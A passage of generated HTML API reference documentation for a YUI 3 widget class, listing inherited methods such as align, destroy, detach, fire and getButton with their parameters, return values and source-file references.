events and handlers to bind to the button node. <strong>See:</strong> <code>Y.Node.on()</code>,
this value is passed as the first argument to <code>on()</code>.</p>
</div>
</li>
<li class="param">
<code class="param-name optional">[isDefault=false]</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>Whether the button is the
default button.</p>
</div>
</li>
<li class="param">
<code class="param-name optional">[label]</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>The visible text/value displayed in the
button.</p>
</div>
</li>
<li class="param">
<code class="param-name optional">[name]</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>A name which can later be used to reference
this button. If a button is defined on the <code>BUTTONS</code> property with this
same name, its configuration properties will be merged in as defaults.</p>
</div>
</li>
<li class="param">
<code class="param-name optional">[section]</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>The <code>WidgetStdMod</code> section (header, body,
footer) where the button should be added.</p>
</div>
</li>
<li class="param">
<code class="param-name optional">[srcNode]</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>An existing Node to use for the button,
default values will be seeded from this node, but are overriden by any
values specified in the config object. By default a new <button>
node will be created.</p>
</div>
</li>
<li class="param">
<code class="param-name optional">[template]</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>A specific template to use when creating
a new button node (e.g. "<a />"). <strong>Note:</strong> Specifying a <code>srcNode</code>
will overide this.</p>
</div>
</li>
</ul>
</li>
<li class="param">
<code class="param-name optional">[section="footer"]</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>The <code>WidgetStdMod</code> section
(header/body/footer) where the button should be added. This takes
precedence over the <code>button.section</code> configuration property.</p>
</div>
</li>
<li class="param">
<code class="param-name optional">[index]</code>
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>The index at which the button should be inserted. If
not specified, the button will be added to the end of the section. This
value is passed to the Array <code>splice()</code> method, therefore a negative
value will insert the <code>button</code> that many items from the end.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method_addTarget" class="method item inherited">
<h3 class="name"><code>addTarget</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>o</code>
</li>
</ul><span class="paren">)</span>
</div>
<div class="meta">
<p>Inherited from
<a href="../classes/EventTarget.html#method_addTarget">EventTarget</a>:
<a href="../files/event-custom_js_event-facade.js.html#l387"><code>event-custom/js/event-facade.js:387</code></a>
</p>
</div>
<div class="description">
<p>Registers another EventTarget as a bubble target. Bubble order
is determined by the order registered. Multiple targets can
be specified.</p>
<p>Events can only bubble if emitFacade is true.</p>
<p>Included in the event-custom-complex submodule.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">o</code>
<span class="type"><a href="../classes/EventTarget.html" class="crosslink">EventTarget</a></span>
<div class="param-description">
<p>the target to add</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method_after" class="method item inherited">
<h3 class="name"><code>after</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>type</code>
</li>
<li class="arg">
<code>fn</code>
</li>
<li class="arg">
<code class="optional">[context]</code>
</li>
<li class="arg">
<code class="optional">[arg*]</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="../classes/EventHandle.html" class="crosslink">EventHandle</a></span>
</span>
<div class="meta">
<p>Inherited from
<a href="../classes/EventTarget.html#method_after">EventTarget</a>:
<a href="../files/event-custom_js_event-target.js.html#l744"><code>event-custom/js/event-target.js:744</code></a>
</p>
</div>
<div class="description">
<p>Subscribe to a custom event hosted by this object. The
supplied callback will execute after any listeners add
via the subscribe method, and after the default function,
if configured for the event, has executed.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">type</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The name of the event</p>
</div>
</li>
<li class="param">
<code class="param-name">fn</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Function" class="crosslink external" target="_blank">Function</a></span>
<div class="param-description">
<p>The callback to execute in response to the event</p>
</div>
</li>
<li class="param">
<code class="param-name optional">[context]</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>Override <code>this</code> object in callback</p>
</div>
</li>
<li class="param">
<code class="param-name optional">[arg*]</code>
<span class="type">Any</span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>0..n additional arguments to supply to the subscriber</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/EventHandle.html" class="crosslink">EventHandle</a></span>:
A subscription handle capable of detaching the
subscription
</div>
</div>
</div>
<div id="method_align" class="method item inherited">
<h3 class="name"><code>align</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code class="optional">[node]</code>
</li>
<li class="arg">
<code class="optional">[points]</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag chainable">chainable</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionAlign.html#method_align">WidgetPositionAlign</a>:
<a href="../files/widget-position-align_js_Widget-PositionAlign.js.html#l275"><code>widget-position-align/js/Widget-PositionAlign.js:275</code></a>
</p>
</div>
<div class="description">
<p>Aligns this widget to the provided <code>Node</code> (or viewport) using the provided
points. This method can be invoked with no arguments which will cause the
widget's current <code>align</code> Attribute value to be synced to the DOM.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name optional">[node]</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a> | <a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a> | Null</span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>A reference (or selector String) for the
<code>Node</code> which with the widget is to be aligned. If null is passed in, the
widget will be aligned with the viewport.</p>
</div>
</li>
<li class="param">
<code class="param-name optional">[points]</code>
<span class="type">Array2</span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>A two item array specifying the points on the
widget and <code>Node</code>/viewport which will to be aligned. The first entry is
the point on the widget, and the second entry is the point on the
<code>Node</code>/viewport. Valid point references are defined as static constants on
the <code>WidgetPositionAlign</code> extension.</p>
</div>
</li>
</ul>
</div>
<div class="example">
<h4>Example:</h4>
<div class="example-content">
<p>Aligning to the top-left corner of the <code><body></code>:</p>
<pre class="code"><code class="prettyprint">myWidget.align('body',
[Y.WidgetPositionAlign.TL, Y.WidgetPositionAlign.TR]);
</code></pre>
</div>
</div>
</div>
<div id="method_ancestor" class="method item inherited">
<h3 class="name"><code>ancestor</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>depth</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="../classes/Widget.html" class="crosslink">Widget</a></span>
</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method_ancestor">Widget</a>:
<a href="../files/widget-child_js_Widget-Child.js.html#l279"><code>widget-child/js/Widget-Child.js:279</code></a>
</p>
</div>
<div class="description">
<p>Returns the Widget instance at the specified depth.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">depth</code>
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>
<div class="param-description">
<p>Number representing the depth of the ancestor.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/Widget.html" class="crosslink">Widget</a></span>:
Widget instance.
</div>
</div>
</div>
<div id="method_attrAdded" class="method item inherited">
<h3 class="name"><code>attrAdded</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>name</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
</span>
<div class="meta">
<p>Inherited from
<a href="../classes/AttributeCore.html#method_attrAdded">AttributeCore</a>:
<a href="../files/attribute_js_AttributeCore.js.html#l272"><code>attribute/js/AttributeCore.js:272</code></a>
</p>
</div>
<div class="description">
<p>Checks if the given attribute has been added to the host</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">name</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The name of the attribute to check.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>:
true if an attribute with the given name has been added, false if it hasn't. This method will return true for lazily added attributes.
</div>
</div>
</div>
<div id="method_before" class="method item inherited">
<h3 class="name"><code>before</code></h3>
<span class="paren">()</span>
<span class="returns-inline">
<span class="type"></span>
</span>
<div class="meta">
<p>Inherited from
<a href="../classes/EventTarget.html#method_before">EventTarget</a>:
<a href="../files/event-custom_js_event-target.js.html#l781"><code>event-custom/js/event-target.js:781</code></a>
</p>
</div>
<div class="description">
<p>Executes the callback before a DOM event, custom event
or method. If the first argument is a function, it
is assumed the target is a method. For DOM and custom
events, this is an alias for Y.on.</p>
<p>For DOM and custom events:
type, callback, context, 0-n arguments</p>
<p>For methods:
callback, object (method host), methodName, context, 0-n arguments</p>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
detach handle
</div>
</div>
</div>
<div id="method_bindUI" class="method item protected inherited">
<h3 class="name"><code>bindUI</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method_bindUI">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l609"><code>widget/js/Widget.js:609</code></a>
</p>
</div>
<div class="description">
<p>Configures/Sets up listeners to bind Widget State to UI/DOM</p>
<p>This method is not called by framework and is not chained
automatically for the class hierarchy.</p>
</div>
</div>
<div id="method_blur" class="method item inherited">
<h3 class="name"><code>blur</code></h3>
<span class="paren">()</span>
<span class="flag chainable">chainable</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method_blur">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l671"><code>widget/js/Widget.js:671</code></a>
</p>
</div>
<div class="description">
<p>Causes the Widget to lose focus by setting the "focused" attribute
to "false"</p>
</div>
</div>
<div id="method_bubble" class="method item inherited">
<h3 class="name"><code>bubble</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>evt</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
</span>
<div class="meta">
<p>Inherited from
<a href="../classes/EventTarget.html#method_bubble">EventTarget</a>:
<a href="../files/event-custom_js_event-facade.js.html#l424"><code>event-custom/js/event-facade.js:424</code></a>
</p>
</div>
<div class="description">
<p>Propagate an event. Requires the event-custom-complex module.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">evt</code>
<span class="type"><a href="../classes/CustomEvent.html" class="crosslink">CustomEvent</a></span>
<div class="param-description">
<p>the custom event to propagate</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>:
the aggregated return value from Event.Custom.fire
</div>
</div>
</div>
<div id="method_centered" class="method item inherited">
<h3 class="name"><code>centered</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code class="optional">[node]</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag chainable">chainable</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionAlign.html#method_centered">WidgetPositionAlign</a>:
<a href="../files/widget-position-align_js_Widget-PositionAlign.js.html#l311"><code>widget-position-align/js/Widget-PositionAlign.js:311</code></a>
</p>
</div>
<div class="description">
<p>Centers the widget in the viewport, or if a <code>Node</code> is passed in, it will
be centered to that <code>Node</code>.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name optional">[node]</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a> | <a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>A <code>Node</code> reference or selector String defining
the <code>Node</code> which the widget should be centered. If a <code>Node</code> is not passed
in, then the widget will be centered to the viewport.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method_constrain" class="method item inherited">
<h3 class="name"><code>constrain</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>xy</code>
</li>
<li class="arg">
<code>node</code>
</li>
</ul><span class="paren">)</span>
</div>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionConstrain.html#method_constrain">WidgetPositionConstrain</a>:
<a href="../files/widget-position-constrain_js_Widget-PositionConstrain.js.html#l128"><code>widget-position-constrain/js/Widget-PositionConstrain.js:128</code></a>
</p>
</div>
<div class="description">
<p>Constrains the widget's bounding box to a node (or the viewport). If xy or node are not
passed in, the current position and the value of "constrain" will be used respectively.</p>
<p>The widget's position will be changed to the constrained position.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">xy</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Array" class="crosslink external" target="_blank">Array</a></span>
<div class="param-description">
<p>Optional. The xy values to constrain</p>
</div>
</li>
<li class="param">
<code class="param-name">node</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a> | boolean</span>
<div class="param-description">
<p>Optional. The node to constrain to, or true for the viewport</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method_destroy" class="method item inherited">
<h3 class="name"><code>destroy</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>destroyAllNodes</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="../classes/Widget.html" class="crosslink">Widget</a></span>
</span>
<span class="flag chainable">chainable</span>
<div class="meta">
<p>Inherited from
<a href="../classes/BaseCore.html#method_destroy">
BaseCore
</a>
but overwritten in
<a href="../files/widget_js_Widget.js.html#l452"><code>widget/js/Widget.js:452</code></a>
</p>
</div>
<div class="description">
<p>
Destroy lifecycle method. Fires the destroy
event, prior to invoking destructors for the
class hierarchy.
Overrides Base's implementation, to support arguments to destroy
</p>
<p>
Subscribers to the destroy
event can invoke preventDefault on the event object, to prevent destruction
from proceeding.
</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">destroyAllNodes</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<div class="param-description">
<p>If true, all nodes contained within the Widget are removed and destroyed. Defaults to false due to potentially high run-time cost.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/Widget.html" class="crosslink">Widget</a></span>:
A reference to this object
</div>
</div>
</div>
<div id="method_destructor" class="method item protected inherited">
<h3 class="name"><code>destructor</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method_destructor">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l427"><code>widget/js/Widget.js:427</code></a>
</p>
</div>
<div class="description">
<p>Destructor lifecycle implementation for the Widget class. Purges events attached
to the bounding box and content box, removes them from the DOM and removes
the Widget from the list of registered widgets.</p>
</div>
</div>
<div id="method_detach" class="method item inherited">
<h3 class="name"><code>detach</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>type</code>
</li>
<li class="arg">
<code>fn</code>
</li>
<li class="arg">
<code>context</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="../classes/EventTarget.html" class="crosslink">EventTarget</a></span>
</span>
<div class="meta">
<p>Inherited from
<a href="../classes/EventTarget.html#method_detach">EventTarget</a>:
<a href="../files/event-custom_js_event-target.js.html#l344"><code>event-custom/js/event-target.js:344</code></a>
</p>
</div>
<div class="description">
<p>Detach one or more listeners the from the specified event</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">type</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a> | <a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>Either the handle to the subscriber or the
type of event. If the type
is not specified, it will attempt to remove
the listener from all hosted events.</p>
</div>
</li>
<li class="param">
<code class="param-name">fn</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Function" class="crosslink external" target="_blank">Function</a></span>
<div class="param-description">
<p>The subscribed function to unsubscribe, if not
supplied, all subscribers will be removed.</p>
</div>
</li>
<li class="param">
<code class="param-name">context</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>The custom object passed to subscribe. This is
optional, but if supplied will be used to
disambiguate multiple listeners that are the same
(e.g., you subscribe many object using a function
that lives on the prototype)</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/EventTarget.html" class="crosslink">EventTarget</a></span>:
the host
</div>
</div>
</div>
<div id="method_detachAll" class="method item inherited">
<h3 class="name"><code>detachAll</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>type</code>
</li>
</ul><span class="paren">)</span>
</div>
<div class="meta">
<p>Inherited from
<a href="../classes/EventTarget.html#method_detachAll">EventTarget</a>:
<a href="../files/event-custom_js_event-target.js.html#l464"><code>event-custom/js/event-target.js:464</code></a>
</p>
</div>
<div class="description">
<p>Removes all listeners from the specified event. If the event type
is not specified, all listeners from all hosted custom events will
be removed.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">type</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The type, or name of the event</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method_disable" class="method item inherited">
<h3 class="name"><code>disable</code></h3>
<span class="paren">()</span>
<span class="flag chainable">chainable</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method_disable">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l690"><code>widget/js/Widget.js:690</code></a>
</p>
</div>
<div class="description">
<p>Set the Widget's "disabled" attribute to "true".</p>
</div>
</div>
<div id="method_enable" class="method item inherited">
<h3 class="name"><code>enable</code></h3>
<span class="paren">()</span>
<span class="flag chainable">chainable</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method_enable">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l681"><code>widget/js/Widget.js:681</code></a>
</p>
</div>
<div class="description">
<p>Set the Widget's "disabled" attribute to "false".</p>
</div>
</div>
<div id="method_enable or disable constraints listeners" class="method item private inherited">
<h3 class="name"><code>enable or disable constraints listeners</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>enable</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionConstrain.html#method_enable or disable constraints listeners">WidgetPositionConstrain</a>:
<a href="../files/widget-position-constrain_js_Widget-PositionConstrain.js.html#l287"><code>widget-position-constrain/js/Widget-PositionConstrain.js:287</code></a>
</p>
</div>
<div class="description">
<p>Updates the UI if enabling constraints, and sets up the xyChange event listeners
to constrain whenever the widget is moved. Disabling constraints removes the listeners.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">enable</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<div class="param-description">
<p>Enable or disable constraints</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method_fillHeight" class="method item inherited">
<h3 class="name"><code>fillHeight</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>node</code>
</li>
</ul><span class="paren">)</span>
</div>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#method_fillHeight">WidgetStdMod</a>:
<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l712"><code>widget-stdmod/js/Widget-StdMod.js:712</code></a>
</p>
</div>
<div class="description">
<p>Sets the height on the provided header, body or footer element to
fill out the height of the Widget. It determines the height of the
widgets bounding box, based on it's configured height value, and
sets the height of the provided section to fill out any
space remaining after the other standard module section heights
have been accounted for.</p>
<p><strong>NOTE:</strong> This method is not designed to work if an explicit
height has not been set on the Widget, since for an "auto" height Widget,
the heights of the header/body/footer will drive the height of the Widget.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">node</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
<div class="param-description">
<p>The node which should be resized to fill out the height
of the Widget bounding box. Should be a standard module section node which belongs
to the widget.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method_fire" class="method item inherited">
<h3 class="name"><code>fire</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>type</code>
</li>
<li class="arg">
<code>arguments</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="../classes/EventTarget.html" class="crosslink">EventTarget</a></span>
</span>
<div class="meta">
<p>Inherited from
<a href="../classes/EventTarget.html#method_fire">EventTarget</a>:
<a href="../files/event-custom_js_event-target.js.html#l641"><code>event-custom/js/event-target.js:641</code></a>
</p>
</div>
<div class="description">
<p>Fire a custom event by name. The callback functions will be executed
from the context specified when the event was created, and with the
following parameters.</p>
<p>If the custom event object hasn't been created, then the event hasn't
been published and it has no subscribers. For performance sake, we
immediate exit in this case. This means the event won't bubble, so
if the intention is that a bubble target be notified, the event must
be published on this object first.</p>
<p>The first argument is the event type, and any additional arguments are
passed to the listeners as parameters. If the first of these is an
object literal, and the event is configured to emit an event facade,
that object is mixed into the event facade and the facade is provided
in place of the original object.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">type</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a> | <a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>The type of the event, or an object that contains
a 'type' property.</p>
</div>
</li>
<li class="param">
<code class="param-name">arguments</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object*</a></span>
<div class="param-description">
<p>an arbitrary set of parameters to pass to
the handler. If the first of these is an object literal and the event is
configured to emit an event facade, the event facade will replace that
parameter after the properties the object literal contains are copied to
the event facade.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/EventTarget.html" class="crosslink">EventTarget</a></span>:
the event host
</div>
</div>
</div>
<div id="method_focus" class="method item inherited">
<h3 class="name"><code>focus</code></h3>
<span class="paren">()</span>
<span class="flag chainable">chainable</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method_focus">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l661"><code>widget/js/Widget.js:661</code></a>
</p>
</div>
<div class="description">
<p>Causes the Widget to receive the focus by setting the "focused"
attribute to "true".</p>
</div>
</div>
<div id="method_get" class="method item inherited">
<h3 class="name"><code>get</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>name</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type">Any</span>
</span>
<div class="meta">
<p>Inherited from
<a href="../classes/AttributeCore.html#method_get">AttributeCore</a>:
<a href="../files/attribute_js_AttributeCore.js.html#l283"><code>attribute/js/AttributeCore.js:283</code></a>
</p>
</div>
<div class="description">
<p>Returns the current value of the attribute. If the attribute
has been configured with a 'getter' function, this method will delegate
to the 'getter' to obtain the value of the attribute.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">name</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The name of the attribute. If the value of the attribute is an Object,
dot notation can be used to obtain the value of a property of the object (e.g. <code>get("x.y.z")</code>)</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type">Any</span>:
The value of the attribute
</div>
</div>
</div>
<div id="method_getAttrs" class="method item inherited">
<h3 class="name"><code>getAttrs</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>attrs</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
</span>
<div class="meta">
<p>Inherited from
<a href="../classes/AttributeCore.html#method_getAttrs">AttributeCore</a>:
<a href="../files/attribute_js_AttributeCore.js.html#l666"><code>attribute/js/AttributeCore.js:666</code></a>
</p>
</div>
<div class="description">
<p>Gets multiple attribute values.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">attrs</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Array" class="crosslink external" target="_blank">Array</a> | boolean</span>
<div class="param-description">
<p>Optional. An array of attribute names. If omitted, all attribute values are
returned. If set to true, all attributes modified from their initial values are returned.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>:
An object with attribute name/value pairs.
</div>
</div>
</div>
<div id="method_getButton" class="method item inherited">
<h3 class="name"><code>getButton</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>name</code>
</li>
<li class="arg">
<code class="optional">[section="footer"]</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#method_getButton">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l388"><code>widget-buttons/js/widget-buttons.js:388</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>Returns a button node from this widget's <code>buttons</code>.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">name</code>
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a> | <a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The string name or index of the button.</p>
</div>
</li>
<li class="param">
<code class="param-name optional">[section="footer"]</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>The <code>WidgetStdMod</code> section
(header/body/footer) where the button exists. Only applicable when
